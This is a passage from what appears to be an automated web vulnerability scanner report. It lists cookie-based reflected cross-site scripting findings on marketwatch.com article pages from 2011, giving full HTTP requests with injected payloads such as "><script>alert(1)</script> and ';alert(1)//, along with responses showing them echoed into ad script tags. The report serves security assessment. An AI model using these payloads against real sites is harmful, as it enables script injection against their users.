Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&56b02"><script>alert(1)</script>4af42568a0c; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A3%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Article_Futures%252520Movers_53B5F46A-7D06-11E0-915A-00212804637C%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13%25253Flink%25253DMW_story_in%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdedtwebp04
Date: Sat, 14 May 2011 10:33:59 GMT
Content-Length: 141753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script src="http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;s=8_10001;u=%5e%5elA;biz=1053;56b02"><script>alert(1)</script>4af42568a0c;sz=230x25;tile=1;ord=1179691810?" type="text/javascript">
...[SNIP]...

4.115. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_csl cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

Issue detail

The value of the rsi_csl cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65b46'%3balert(1)//2bc564917cd was submitted in the rsi_csl cookie. This input was echoed as 65b46';alert(1)//2bc564917cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A3%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA65b46'%3balert(1)//2bc564917cd; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Article_Futures%252520Movers_53B5F46A-7D06-11E0-915A-00212804637C%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13%25253Flink%25253DMW_story_in%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdedtwebp05
Date: Sat, 14 May 2011 10:37:07 GMT
Content-Length: 141515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
Client(
           ScrillaZilla.Client('#ad_PremiumContentBottom',
               {
                   ord : 822959691,
                   src : 'http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe;mc=MWRetWeek;s=8_10001;u=%5e%5elA65b46';alert(1)//2bc564917cd;biz=1053;sz=571x100;tile=1;ord=',
                   width : '571',
                   height : '100',
                   
                   lateLoad : true,
                   refresh : false,
                   independentRefresh : false,
                   refreshRate : 480000,
                   re
...[SNIP]...

4.116. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_csl cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

Issue detail

The value of the rsi_csl cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa672"><script>alert(1)</script>8a2f592393e was submitted in the rsi_csl cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A3%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lAfa672"><script>alert(1)</script>8a2f592393e; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Article_Futures%252520Movers_53B5F46A-7D06-11E0-915A-00212804637C%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13%25253Flink%25253DMW_story_in%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdfinwebp02
Date: Sat, 14 May 2011 10:37:03 GMT
Content-Length: 141693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script src="http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;s=8_10001;u=%5e%5elAfa672"><script>alert(1)</script>8a2f592393e;biz=1053;sz=230x25;tile=1;ord=1752227528?" type="text/javascript">
...[SNIP]...

4.117. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_segs cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

Issue detail

The value of the rsi_segs cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe1c5"><script>alert(1)</script>51f807aa8f0 was submitted in the rsi_segs cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A3%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001fe1c5"><script>alert(1)</script>51f807aa8f0; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Article_Futures%252520Movers_53B5F46A-7D06-11E0-915A-00212804637C%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13%25253Flink%25253DMW_story_in%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdfinwebp05
Date: Sat, 14 May 2011 10:38:05 GMT
Content-Length: 141755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script src="http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;s=8_10001fe1c5"><script>alert(1)</script>51f807aa8f0;u=%5e%5elA;biz=1053;sz=230x25;tile=1;ord=726643700?" type="text/javascript">
...[SNIP]...

4.118. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_segs cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

Issue detail

The value of the rsi_segs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 509ee'%3balert(1)//804f8172b67 was submitted in the rsi_segs cookie. This input was echoed as 509ee';alert(1)//804f8172b67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A3%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001509ee'%3balert(1)//804f8172b67; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Article_Futures%252520Movers_53B5F46A-7D06-11E0-915A-00212804637C%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13%25253Flink%25253DMW_story_in%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdedtwebp01
Date: Sat, 14 May 2011 10:38:09 GMT
Content-Length: 141465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
.Escort.addClient(
           ScrillaZilla.Client('#ad_PremiumContentBottom',
               {
                   ord : 919275682,
                   src : 'http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe;mc=MWRetWeek;s=8_10001509ee';alert(1)//804f8172b67;u=%5e%5elA;biz=1053;sz=571x100;tile=1;ord=',
                   width : '571',
                   height : '100',
                   
                   lateLoad : true,
                   refresh : false,
                   independentRefresh : false,
                   refreshRate : 48000
...[SNIP]...

4.119. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [BIZO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390

Issue detail

The value of the BIZO cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3983e'-alert(1)-'1a648a25759 was submitted in the BIZO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390?Link=obinsite HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=f465737d830a35fc698cafafb4ce7caf&rdid=205292719&type=IMD_def_prd&in-site=true&req_id=cd9a83f96a2d455991d95bc48290df11&agent=blog_JS_rec&recMode=3&reqType=1&wid=102&imgType=0&version=37740&idx=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&3983e'-alert(1)-'1a648a25759; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A4%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdfpswebp04
Date: Sat, 14 May 2011 10:37:43 GMT
Content-Length: 104571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
illaZilla.Client('#ad_BrokerButton1',
               {
                   ord : 1531063701,
                   src : 'http://ad.doubleclick.net/adi/brokerbuttons.marketwatch.com/personalfinance_story;pos=1;s=8_10001;u=%5e%5elA;biz=1053;3983e'-alert(1)-'1a648a25759;sz=288x40;tile=10;ord=',
                   width : '288',
                   height : '40',
                   
                   lateLoad : true,
                   refresh : false,
                   independentRefresh : false,
                   refreshRate : 480000,
                   refreshDomai
...[SNIP]...

4.120. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [BIZO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390

Issue detail

The value of the BIZO cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1fbb"><script>alert(1)</script>a3254d0924a was submitted in the BIZO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390?Link=obinsite HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=f465737d830a35fc698cafafb4ce7caf&rdid=205292719&type=IMD_def_prd&in-site=true&req_id=cd9a83f96a2d455991d95bc48290df11&agent=blog_JS_rec&recMode=3&reqType=1&wid=102&imgType=0&version=37740&idx=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&b1fbb"><script>alert(1)</script>a3254d0924a; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A4%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdfpswebp05
Date: Sat, 14 May 2011 10:37:40 GMT
Content-Length: 104616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script src="http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;s=8_10001;u=%5e%5elA;biz=1053;b1fbb"><script>alert(1)</script>a3254d0924a;sz=230x25;tile=1;ord=1338431719?" type="text/javascript">
...[SNIP]...

4.121. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [rsi_csl cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390

Issue detail

The value of the rsi_csl cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57f72"><script>alert(1)</script>b7608fae4f2 was submitted in the rsi_csl cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390?Link=obinsite HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=f465737d830a35fc698cafafb4ce7caf&rdid=205292719&type=IMD_def_prd&in-site=true&req_id=cd9a83f96a2d455991d95bc48290df11&agent=blog_JS_rec&recMode=3&reqType=1&wid=102&imgType=0&version=37740&idx=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A4%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA57f72"><script>alert(1)</script>b7608fae4f2; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Sat, 14 May 2011 10:40:05 GMT
Content-Length: 104690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script src="http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;s=8_10001;u=%5e%5elA57f72"><script>alert(1)</script>b7608fae4f2;biz=1053;sz=230x25;tile=1;ord=726643700?" type="text/javascript">
...[SNIP]...

4.122. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [rsi_csl cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390

Issue detail

The value of the rsi_csl cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fa5c'%3balert(1)//b8b069676ae was submitted in the rsi_csl cookie. This input was echoed as 7fa5c';alert(1)//b8b069676ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390?Link=obinsite HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=f465737d830a35fc698cafafb4ce7caf&rdid=205292719&type=IMD_def_prd&in-site=true&req_id=cd9a83f96a2d455991d95bc48290df11&agent=blog_JS_rec&recMode=3&reqType=1&wid=102&imgType=0&version=37740&idx=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A4%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA7fa5c'%3balert(1)//b8b069676ae; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp03
Date: Sat, 14 May 2011 10:40:07 GMT
Content-Length: 104464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
t(
           ScrillaZilla.Client('#ad_BrokerButton1',
               {
                   ord : 1944859510,
                   src : 'http://ad.doubleclick.net/adi/brokerbuttons.marketwatch.com/personalfinance_story;pos=1;s=8_10001;u=%5e%5elA7fa5c';alert(1)//b8b069676ae;biz=1053;sz=288x40;tile=10;ord=',
                   width : '288',
                   height : '40',
                   
                   lateLoad : true,
                   refresh : false,
                   independentRefresh : false,
                   refreshRate : 480000,
                   ref
...[SNIP]...

4.123. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [rsi_segs cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390

Issue detail

The value of the rsi_segs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25c27'%3balert(1)//18ee691e600 was submitted in the rsi_segs cookie. This input was echoed as 25c27';alert(1)//18ee691e600 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

